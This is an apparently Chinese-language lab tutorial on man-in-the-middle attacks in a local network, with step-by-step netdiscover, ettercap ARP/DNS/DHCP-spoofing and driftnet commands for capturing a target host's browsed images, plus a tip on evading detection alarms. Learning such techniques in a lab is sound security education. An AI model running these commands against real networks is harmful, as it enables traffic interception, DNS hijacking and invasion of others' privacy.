前言:
由於在區域網中,閘道器會不斷地傳送 ARP 資料包詢問當前是否有新的客戶端上線,如果我們可以欺騙當前區域網網段下的主機,
實驗環境:
1、虛擬機器 A(kali)
2、實驗主機 B(win 10)
3、保證虛擬機器和主機在同一網段,方法在上一篇有寫
實驗步驟:
1、kali 裡使用 netdiscover -i eth0 [-r range...] 來獲取目標主機的 IP 地址,這裡直接使用主機 B 的 IP 和閘道器
2、kali 終端使用 ettercap -i eth0 -Tq -M arp:remote /// /// 來進行流量欺騙,前一個 /// 為 B 的 IP,後者為閘道器
注:/// 的完整寫法為 MAC/IPs/IPv6/PORTs,預設為全部,MAC 為實體地址,IPs 為 IPv4,PORTs 為埠號
若 ettercap 操作失敗,需要我們對其進行提權
修改 /etc/ettercap/etter.conf 檔案,將 ec_uid 和 ec_gid 的值改為 0,可以使用 leafpad、vim 等進行操作
3、開啟一個新的終端,通過 driftnet -i eth0 -a -d dir 來把 B(目標主機)瀏覽的圖片儲存在目錄 dir 裡,也可以通過 -b 彈窗直接檢視瀏覽的圖片
4、開啟主機 B 的瀏覽器檢視圖片(需要 http 的)
5、在 kali 裡開啟相應資料夾,檢視裡面的內容
擴充套件:
1、netdiscover:
a、基於 ARP 協議
b、主動或被動地發現WIFI或交換網路的主機
c、常用引數選項:
-i :介面。選擇你監控的介面,比如eth0
-r :range 比如192.168.0.0/24(/24 表示網路號為 24 位)
-l :從檔案讀取range列表
-p :被動模式
-t :每個ARP請求之間等待時長,單位為毫秒。這個可以用來規避檢測系統的告警
-c :對每個IP發多少個探針
-P :輸出形式更適合重定向到一個檔案中。
注:具體可以使用 man netdiscover 或 netdiscover -h 來查詢詳細操作
ARP 協議是將 IP 地址轉換為 MAC 地址(實體地址)地網路協議
區域網中主機的通訊是通過 MAC 地址來實現的,區分 IPv4 裡的網路號和主機號
2、ettercap [OPTIONS] [TARGET1] [TARGET2]:
a、兩種執行方式:UNIFIED 方式是以中間人方式嗅探;BRIDGED 方式是在雙網絡卡情況下,嗅探兩塊網絡卡之間的資料包
b、常用引數:
-i :指定介面
-T :文字模式,常配合 -q 安靜模式使用,-s 表示載入指令碼
-M :指定中間人模式
·ARP 欺騙:arp:remote(雙向)、arp:oneway(單向,欺騙目標一到目標二的通訊)
·ICMP 欺騙:icmp:(MAC/IP)
·DHCP 欺騙:dhcp:(ip_pool/netmask/dns)
如:-M dhcp:/255.255.255.0/192.168.0.1 不提供 IP 地址,只欺騙目標子網掩碼和 DNS 伺服器
c、常見引數組合:
ARP 毒化 eth0 所在的網段,安靜模式文字顯示:ettercap -Tqi eth0 -M ARP /// ///
對 192.168.1.120 進行 DNS 欺騙,使用預設網絡卡 eth0,文字模式安靜顯示:ettercap -Tq -P dns_spoof -M arp:remote /192.168.1.120// ///
3、driftnet [options] [filter code]:
a、driftnet 是一款使用簡單的圖片捕獲工具,可以很方便的在網路資料包中抓取圖片
b、引數命令:
-b :捕獲到新的圖片時發出嘟嘟聲
-i :選擇監聽介面
-f:讀取一個指定 pcap 資料包中的圖片
-p :不讓所監聽的介面使用混雜模式
-a :後臺模式,將捕獲的圖片儲存到目錄中(不會顯示在螢幕上)
-m :指定儲存圖片數的數目
-d :指定儲存圖片的路徑(目錄)
-x:指定儲存圖片的字首名
就會自動分享給你微訊號。歡迎大家加入我們的安全大家庭。提高大家的安全意識,提升大家的網路安全技能一直是我們的初衷和願景,讓我們共同成為守護資訊世界的"SaFeMAN"。